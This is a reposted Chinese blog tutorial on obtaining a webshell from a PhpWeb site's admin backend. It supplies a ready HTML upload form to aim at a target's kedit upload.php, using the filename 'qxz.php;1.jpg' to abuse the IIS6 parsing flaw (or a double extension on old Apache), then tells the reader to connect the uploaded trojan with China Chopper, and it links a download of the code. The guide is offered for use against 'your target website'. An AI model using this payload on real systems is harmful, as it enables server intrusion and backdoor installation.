码迷,mamicode.com
首页 > Web开发 > 详细

关于phpweb后台拿shell简单方法。

时间:2014-05-01 08:46:04      阅读:453      评论:0      收藏:0      [点我收藏+]

标签:style   class   tar   ext   width   art   get   html   文件   cti   htm   

关于phpweb后台拿shell简单方法。
 
首先登录后台admin.php
mamicode.com,码迷
 
登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地址。 
 
代码文件如下:
<form name=”uploadForm” method=”post” enctype=”multipart/form-data” action=”http://www.xxx.com/kedit/upload_cgi/upload.php”> 
<input type=”text” name=”fileName” value=”qxz.php;1.jpg” /> 
<input type=”hidden” name=”attachPath” value=”news/pics/” /> 
<input type=”file” name=”fileData” size=”14″ /></td> 
<input type=”submit” name=”button” value=”确定” /> 
</form>
 
然后选择你的马儿再上传
mamicode.com,码迷
 
上传后如果为iis6,就点击查看源码就可以找到马儿的路径了。
 
mamicode.com,码迷
 

 

 
菜刀链接看下
 
mamicode.com,码迷
 
PS:qxz.php;1.jpg这样的文件是允许上传的,只要服务器是IIS6就拿到webshell,低版本的apache可以试着重命名为qxz.php.jpg
 
代码文件下载地址:http://pan.baidu.com/s/1eRzHs

 

原创文章转载请注明:转载自 七行者博客

本文固定链接: http://www.qxzxp.com/4117.html

关于phpweb后台拿shell简单方法。,码迷,mamicode.com

关于phpweb后台拿shell简单方法。

标签:style   class   tar   ext   width   art   get   html   文件   cti   htm   

原文地址:http://www.cnblogs.com/Maximumvision/p/3702476.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!